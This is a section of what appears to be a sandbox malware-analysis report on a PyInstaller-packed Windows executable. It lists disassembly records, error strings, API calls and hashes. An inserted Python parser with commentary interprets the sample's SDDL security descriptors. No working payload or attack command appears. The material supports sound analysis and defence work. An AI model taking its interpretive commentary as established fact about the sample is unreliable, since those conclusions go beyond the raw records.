                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                    • API String ID: 3458911817-239921721
                                                    • Opcode ID: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
                                                    • Instruction ID: 961632fb4ccff5c28fe2fdae0b72c08df49d6af367f705c0a9351a79c4a25899
                                                    • Opcode Fuzzy Hash: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
                                                    • Instruction Fuzzy Hash: 9551B372A1866286E710DF22FC811AA7760FF4978CF88413DEA5DE3A95DFBCE5408740
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $header crc mismatch$unknown header flags set
                                                    • API String ID: 0-1127688429
                                                    • Opcode ID: a8b055446104684f1ad95e328151202d31fdc591d47a14639da6131c49358b20
                                                    • Instruction ID: 85752a47fe1dedda91bb88f474a1605c57328ddb666958fbb7e0e8f764d482a7
                                                    • Opcode Fuzzy Hash: a8b055446104684f1ad95e328151202d31fdc591d47a14639da6131c49358b20
                                                    • Instruction Fuzzy Hash: 1EF174726183E54BE7A58B15C889B3E3AA9EF84748F1D453CDA4DA7790CFB8E640C740
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
                                                    • Instruction ID: 638f960447cb12f4dc83968e8cbcbca38eb1bab3a3dc2ffddb770f6a11c25b3e
                                                    • Opcode Fuzzy Hash: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
                                                    • Instruction Fuzzy Hash: C1F0A432A1868586F7A0CF60F8897667360FB9476CF08073ED66D666D4DFBCD0198B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: incorrect header check$invalid window size
                                                    • API String ID: 0-900081337
                                                    • Opcode ID: 7b159ed6ab11f424a85810e34fe73a423a8b15e185d016247a9cbb34ea0f7710
                                                    • Instruction ID: abd48c7ec566f16929f8badabb8e11de369fec34e634c839df872063e4ecb3c2
                                                    • Opcode Fuzzy Hash: 7b159ed6ab11f424a85810e34fe73a423a8b15e185d016247a9cbb34ea0f7710
                                                    • Instruction Fuzzy Hash: 7C91BA72A182D587E7A58F14D88CB7E3AA9FB84348F19413DDA4A967C0DFB8E540CB40

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ff652ed1700-7ff652ed1714 1 7ff652ed172e-7ff652ed1732 0->1 2 7ff652ed1716-7ff652ed172d call 7ff652ed2b10 0->2 4 7ff652ed1734-7ff652ed173d call 7ff652ed12a0 1->4 5 7ff652ed1758-7ff652ed177b call 7ff652ed7e20 1->5 13 7ff652ed174f-7ff652ed1757 4->13 14 7ff652ed173f-7ff652ed174a call 7ff652ed2b10 4->14 11 7ff652ed177d-7ff652ed17a8 call 7ff652ed2870 5->11 12 7ff652ed17a9-7ff652ed17c4 call 7ff652ed4060 5->12 20 7ff652ed17de-7ff652ed17f1 call 7ff652ee1004 12->20 21 7ff652ed17c6-7ff652ed17d9 call 7ff652ed2b10 12->21 14->13 26 7ff652ed1813-7ff652ed1817 20->26 27 7ff652ed17f3-7ff652ed180e call 7ff652ed2870 20->27 28 7ff652ed191f-7ff652ed1922 call 7ff652ee097c 21->28 31 7ff652ed1831-7ff652ed1851 call 7ff652ee5780 26->31 32 7ff652ed1819-7ff652ed1825 call 7ff652ed1050 26->32 37 7ff652ed1917-7ff652ed191a call 7ff652ee097c 27->37 34 7ff652ed1927-7ff652ed193e 28->34 41 7ff652ed1872-7ff652ed1878 31->41 42 7ff652ed1853-7ff652ed186d call 7ff652ed2870 31->42 38 7ff652ed182a-7ff652ed182c 32->38 37->28 38->37 44 7ff652ed1905-7ff652ed1908 call 7ff652ee576c 41->44 45 7ff652ed187e-7ff652ed1887 41->45 50 7ff652ed190d-7ff652ed1912 42->50 44->50 48 7ff652ed1890-7ff652ed18b2 call 7ff652ee0ccc 45->48 52 7ff652ed18b4-7ff652ed18cc call 7ff652ee140c 48->52 53 7ff652ed18e5-7ff652ed18ec 48->53 50->37 58 7ff652ed18d5-7ff652ed18e3 52->58 59 7ff652ed18ce-7ff652ed18d1 52->59 55 7ff652ed18f3-7ff652ed18fb call 7ff652ed2870 53->55 62 7ff652ed1900 55->62 58->55 59->48 61 7ff652ed18d3 59->61 61->62 62->44
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                    • API String ID: 2030045667-3833288071
                                                    • Opcode ID: c5d2b1fe77158624b544ad189e1269337dcf1207535d0e93ed6b37356d3eb2cf
                                                    • Instruction ID: bec636a23b368cec6d45e9a484c1a1a1560773c4d4407361b0a5df1b768b826e
                                                    • Opcode Fuzzy Hash: c5d2b1fe77158624b544ad189e1269337dcf1207535d0e93ed6b37356d3eb2cf
                                                    • Instruction Fuzzy Hash: 2C51B066B186A382EB10DB11EC102BA6351BF85BD8F4C503DDE4DAB6A6DFBCE544C300

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock$Message
                                                    • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                    • API String ID: 677216364-1384898525
                                                    • Opcode ID: bf128d8c0f4f5afb435b79e4ddcccd3715ca7ff058bce9239159cfeb574f13cf
                                                    • Instruction ID: 7f5e1cfbb4048fc3409d79c7b7cc7cac95eec8d3311b56405f27a393616b408e
                                                    • Opcode Fuzzy Hash: bf128d8c0f4f5afb435b79e4ddcccd3715ca7ff058bce9239159cfeb574f13cf
                                                    • Instruction Fuzzy Hash: 42518372A1965286EB18DF24EC501B933A0EF88B8CF59853DDA0DE7795DEBCE440C704

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                    • String ID: CreateProcessW$Error creating child process!
                                                    • API String ID: 2895956056-3524285272
                                                    • Opcode ID: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
                                                    • Instruction ID: 5bd2df48b4d1b6d0ac0c9d186641800ec3adcdfdf96b928d19c984ed873b47b5
                                                    • Opcode Fuzzy Hash: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
                                                    • Instruction Fuzzy Hash: F2413332A0879281DA20DB64F8552AAB3A4FF94368F54073DE6AD937E5DFBCD0458B00

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 511 7ff652ed1050-7ff652ed10ab call 7ff652edb840 514 7ff652ed10d3-7ff652ed10eb call 7ff652ee5780 511->514 515 7ff652ed10ad-7ff652ed10d2 call 7ff652ed2b10 511->515 520 7ff652ed10ed-7ff652ed1104 call 7ff652ed2870 514->520 521 7ff652ed1109-7ff652ed1119 call 7ff652ee5780 514->521 526 7ff652ed1264-7ff652ed1279 call 7ff652edb520 call 7ff652ee576c * 2 520->526 527 7ff652ed111b-7ff652ed1132 call 7ff652ed2870 521->527 528 7ff652ed1137-7ff652ed1149 521->528 543 7ff652ed127e-7ff652ed1298 526->543 527->526 529 7ff652ed1150-7ff652ed1175 call 7ff652ee0ccc 528->529 537 7ff652ed117b-7ff652ed1185 call 7ff652ee0a40 529->537 538 7ff652ed125c 529->538 537->538 544 7ff652ed118b-7ff652ed1197 537->544 538->526 545 7ff652ed11a0-7ff652ed11c8 call 7ff652ed9c80 544->545 548 7ff652ed1241-7ff652ed1257 call 7ff652ed2b10 545->548 549 7ff652ed11ca-7ff652ed11cd 545->549 548->538 550 7ff652ed11cf-7ff652ed11d9 549->550 551 7ff652ed123c 549->551 553 7ff652ed1203-7ff652ed1206 550->553 554 7ff652ed11db-7ff652ed11e8 call 7ff652ee140c 550->554 551->548 555 7ff652ed1208-7ff652ed1216 call 7ff652efaee0 553->555 556 7ff652ed1219-7ff652ed121e 553->556 560 7ff652ed11ed-7ff652ed11f0 554->560 555->556 556->545 559 7ff652ed1220-7ff652ed1223 556->559 564 7ff652ed1225-7ff652ed1228 559->564 565 7ff652ed1237-7ff652ed123a 559->565 561 7ff652ed11f2-7ff652ed11fc call 7ff652ee0a40 560->561 562 7ff652ed11fe-7ff652ed1201 560->562 561->556 561->562 562->548 564->548 567 7ff652ed122a-7ff652ed1232 564->567 565->538 567->529
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                    • API String ID: 2030045667-2813020118
                                                    • Opcode ID: 5dc8684a2cecf44269f5f0e1ce28f82f05211f012bd0d83bdec862f8be7225c5
                                                    • Instruction ID: b572667fd735d1ab09e733ff8569aa201d89fed2f3c8d6100cc25e2ffb32be16
                                                    • Opcode Fuzzy Hash: 5dc8684a2cecf44269f5f0e1ce28f82f05211f012bd0d83bdec862f8be7225c5
                                                    • Instruction Fuzzy Hash: D6519D22A096A285EB60DB51EC403BA6391BB84798F4C413DEE4DEB785EFBCE545D700

                                                    Control-flow Graph

                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF652EEFD5A,?,?,-00000018,00007FF652EEBB0B,?,?,?,00007FF652EEBA02,?,?,?,00007FF652EE698E), ref: 00007FF652EEFB3C
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF652EEFD5A,?,?,-00000018,00007FF652EEBB0B,?,?,?,00007FF652EEBA02,?,?,?,00007FF652EE698E), ref: 00007FF652EEFB48
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                    • Instruction ID: 455373e0c1bfe121e2d0e11226f624022cb8320ed2d81fae9f4f2f02e7430fa0
                                                    • Opcode Fuzzy Hash: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                    • Instruction Fuzzy Hash: 3441E132B19A2381FA16DB16AC105B62396BF45B98F4D513DDD0EFB794EEBCE4458300

                                                    Control-flow Graph
                                                    • (executed/not-executed edge list omitted; basic blocks 7ff652eec80c-7ff652eecc58, with calls to GetConsoleMode, ReadFile, ReadConsoleW and GetLastError)
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
                                                    • Instruction ID: 8b5cbaf2da0721ea4757cbf26fe5d2555cc55c843bdbb5bfa0fbcc3a71662eaa
                                                    • Opcode Fuzzy Hash: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
                                                    • Instruction Fuzzy Hash: 45C1F623A0C7A791EB618B1498502BE3755FB80B88F5D2139DA4EB7791DEFCE846C300

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                    • String ID:
                                                    • API String ID: 995526605-0
                                                    • Opcode ID: 0a78fddd52e4a4b47c0abd3b9ff92470e3f80b7b026c685fad37238cb9e723cb
                                                    • Instruction ID: fb61da6a65fef14c8a9792a61479714cbd6bd91582d344446e7c5d90f969e9a6
                                                    • Opcode Fuzzy Hash: 0a78fddd52e4a4b47c0abd3b9ff92470e3f80b7b026c685fad37238cb9e723cb
                                                    • Instruction Fuzzy Hash: 2C21993260C65281EB10DB55F94453AA3A1FFC57A8F58023DDA9C93AD4DFBCD4568700

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00007FF652ED8860: GetCurrentProcess.KERNEL32 ref: 00007FF652ED8880
                                                      • Part of subcall function 00007FF652ED8860: OpenProcessToken.ADVAPI32 ref: 00007FF652ED8891
                                                      • Part of subcall function 00007FF652ED8860: GetTokenInformation.KERNELBASE ref: 00007FF652ED88B6
                                                      • Part of subcall function 00007FF652ED8860: GetLastError.KERNEL32 ref: 00007FF652ED88C0
                                                      • Part of subcall function 00007FF652ED8860: GetTokenInformation.KERNELBASE ref: 00007FF652ED8900
                                                      • Part of subcall function 00007FF652ED8860: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF652ED891C
                                                      • Part of subcall function 00007FF652ED8860: CloseHandle.KERNEL32 ref: 00007FF652ED8934
                                                    • LocalFree.KERNEL32(00000000,00007FF652ED3B4E), ref: 00007FF652ED8C0C
                                                    • LocalFree.KERNEL32 ref: 00007FF652ED8C15
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                    • API String ID: 6828938-1817031585
                                                    • Opcode ID: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
                                                    • Instruction ID: 0e572d05f9a62d37f22585e6969a8d7b97c99525aa22897262924a16ff28adab
                                                    • Opcode Fuzzy Hash: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
                                                    • Instruction Fuzzy Hash: D4219032A1875281F710DB20FC056FA6260EF84788F8C153EE94DE3696DFBCE5418640
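The two format strings and the S-1-3-4 SID in the String ID field of this record are a DACL in SDDL syntax: one allow ACE granting FA (FILE_ALL_ACCESS) to a SID filled in at runtime, optionally followed by a second ACE for S-1-3-4, the OWNER RIGHTS well-known SID. The same function's subcalls obtain the current process token's user SID (OpenProcessToken, GetTokenInformation, ConvertSidToStringSidW), and the CreateDirectory record further down in this section carries the string "Security descriptor is not initialized!", which is consistent with this descriptor being applied to a directory the sample creates. The parser below is an added triage example, not code from the sample, from Joe Sandbox or from PyInstaller; the S-1-5-21-... user SID used in the demo is constructed, and the well-known SID names are standard Windows values, not something the report states.

```python
"""SDDL DACL parser for the security-descriptor strings in this sample's string table.

Added example for this report; not code from the sample or from Joe Sandbox.
The format strings "D:(A;;FA;;;%s)" and "D:(A;;FA;;;%s)(A;;FA;;;%s)" and the
SID S-1-3-4 are taken from the String ID field above. The user SID used in the
demo is constructed for the example.
"""
import re
from collections import namedtuple

Ace = namedtuple("Ace", "ace_type flags rights sid")

# Well-known SIDs worth recognising during triage (standard Windows meanings,
# not values stated in the report).
WELL_KNOWN_SIDS = {
    "S-1-3-4": "OWNER RIGHTS",
    "S-1-1-0": "Everyone",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-18": "LOCAL SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
}

# One ACE has six ';'-separated fields: (type;flags;rights;object_guid;inherit_guid;sid)
ACE_RE = re.compile(r"\(([A-Z]+);([A-Z]*);([A-Za-z0-9]*);([^;]*);([^;]*);([^)]+)\)")


def parse_dacl(sddl):
    """Split a DACL-only SDDL string ("D:...") into (control_flags, [Ace, ...])."""
    if not sddl.startswith("D:"):
        raise ValueError("expected a DACL string starting with 'D:'")
    body = sddl[2:]
    first = body.find("(")
    control = body if first < 0 else body[:first]   # e.g. "P" (protected), "AI"
    ace_text = "" if first < 0 else body[first:]
    # Reject anything that is not a clean run of "(...)" groups.
    if not re.fullmatch(r"(?:\([^()]*\))*", ace_text):
        raise ValueError("malformed ACE list: %r" % ace_text)
    aces = []
    for m in ACE_RE.finditer(ace_text):
        ace_type, flags, rights, _obj_guid, _inh_guid, sid = m.groups()
        aces.append(Ace(ace_type, flags, rights, sid))
    if len(aces) != ace_text.count("("):
        raise ValueError("an ACE did not match the expected six-field layout")
    return control, aces


def full_access_principals(sddl):
    """SIDs given FILE_ALL_ACCESS ('FA') by allow ('A') ACEs, with a friendly name."""
    _, aces = parse_dacl(sddl)
    return [(a.sid, WELL_KNOWN_SIDS.get(a.sid, "account SID"))
            for a in aces if a.ace_type == "A" and a.rights == "FA"]


def is_world_accessible(sddl):
    """True if Everyone or Authenticated Users receive any allow ACE."""
    _, aces = parse_dacl(sddl)
    return any(a.ace_type == "A" and a.sid in ("S-1-1-0", "S-1-5-11") for a in aces)


def render_report_sddl(user_sid):
    """Fill the two format strings from the string table the way printf would."""
    single = "D:(A;;FA;;;%s)" % user_sid
    double = "D:(A;;FA;;;%s)(A;;FA;;;%s)" % (user_sid, "S-1-3-4")
    return single, double


if __name__ == "__main__":
    demo_sid = "S-1-5-21-1111111111-2222222222-3333333333-1001"   # constructed SID
    for sddl in render_report_sddl(demo_sid):
        print(sddl)
        for sid, name in full_access_principals(sddl):
            print("   FA ->", sid, "(%s)" % name)
        print("   world-accessible:", is_world_accessible(sddl))
```

Run against the two-ACE form, the parser reports full access for the current user's SID and for OWNER RIGHTS only and no world-accessible ACE, so a directory created with this descriptor is private to the user that ran the sample. The same check on a descriptor naming S-1-1-0 instead flags the dropped directory as writable by any local account, which matters when deciding whether other users on the host could tamper with the unpacked payload.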

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,00007FF652ED39CA), ref: 00007FF652ED3F34
                                                      • Part of subcall function 00007FF652ED29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF652ED8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED29F4
                                                      • Part of subcall function 00007FF652ED29C0: MessageBoxW.USER32 ref: 00007FF652ED2AD0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastMessageModuleName
                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                    • API String ID: 2581892565-1977442011
                                                    • Opcode ID: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
                                                    • Instruction ID: a3b8c7d9f08add37f88ab318ff21bf074529e4b88963432268d2c23e1c962f2f
                                                    • Opcode Fuzzy Hash: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
                                                    • Instruction Fuzzy Hash: 27118721B1C56741FB259721EC513FA5364AF887CCF48043EE84EE6AD9EEDCE5458B00
                                                    APIs
                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF652EEDCFB), ref: 00007FF652EEDE2C
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF652EEDCFB), ref: 00007FF652EEDEB7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
